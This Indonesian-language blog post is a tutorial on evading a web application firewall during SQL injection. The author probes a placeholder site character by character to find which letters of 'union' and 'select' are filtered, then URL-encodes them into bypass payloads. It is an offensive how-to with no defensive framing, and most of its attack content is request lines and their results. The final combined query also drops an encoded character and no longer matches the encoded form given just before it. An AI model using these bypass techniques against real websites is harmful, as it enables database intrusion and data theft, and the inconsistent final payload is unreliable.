Identification Bypass SQL-Injection with Mixed UrlEncode Character

Daftar Isi [Tutup]
    Hii sobat pixel udah lama nggak update artikel hehe, ya pada kesempatan kali ini disini saya mau membagikan gimana sih caranya bypass waf, Mungkin sesuai judul yaa waf yang dimaksud disini yaitu pada saat kita akan memasukan query SQL-Injection, kebanyakan dari kalian pasti jika sudah terblock WAF pasti langsung mengandalkan query cheatsheet bukan begitu? hehe yaa tapi nggak salah mengandalkan query cheatsheet SQLi kalian, but disini saya akan melakukan identification apa saja character yang biasa di block oleh WAF tersebut.

    Langsung saja disini saya sudah memiliki target, Disini saya skip ordernya karena tidak ada yang perlu di bypass.

    Kita lanjut ke bagian menghitung jumlah table yang ada pada website. Disini saya menggunakan union select biasa but terkena WAF.
    WAF Blocked

    Langsung disini kita akan mengidentifikasi apa saja character yang terblock oleh waf. Pertama kita masukan kata "union".
    http://fakesite.com/artikel.php?id=1 u > No error
    http://fakesite.com/artikel.php?id=1 un > No error
    http://fakesite.com/artikel.php?id=1 uni > No error
    http://fakesite.com/artikel.php?id=1 unio > No error
    http://fakesite.com/artikel.php?id=1 union > Error
    Yups akhirna ketemu dia memblock character "N" di akhir maka langsung saja character "N" kita encode ke UrlEncode.
    Maka query union menjadi seperti unio%6E

    Lolos dengan mudah bukan? Lanjut dengan kata "select" lakukan hal yang sama.
    http://fakesite.com/artikel.php?id=1 s > No error
    http://fakesite.com/artikel.php?id=1 se > Error
    http://fakesite.com/artikel.php?id=1 sel > Error
    http://fakesite.com/artikel.php?id=1 sele > Error
    http://fakesite.com/artikel.php?id=1 selec > No error
    http://fakesite.com/artikel.php?id=1 select > Error
    Cukup banyak character yang difilter oleh WAF, Lalu kita encode character yang Error tadi dengan UrlEncode.
    Maka query select menjadi seperti s%65%6Cec%74

    Lets see now kita gabungkan query yang sudah di encode url tadi, yosh tembus maka sudah terlihat jumlah tablenya.
    Maka query select menjadi unio%6E s%65%6Cec

    Gimana cukup mudah bukan? Oke mungkin cukup sekian, Jika ada yang belum mengerti bisa komentar ya kak. Semoga bermanfaat and dont forget to share and see you next time byee~

    Buat kalian bisa menggunakan tools UrlEncode ataupun CheatSheet Package Collection SQLi disini.
    SQLi-Labs Click here

    0 Response to "Identification Bypass SQL-Injection with Mixed UrlEncode Character"

    Post a Comment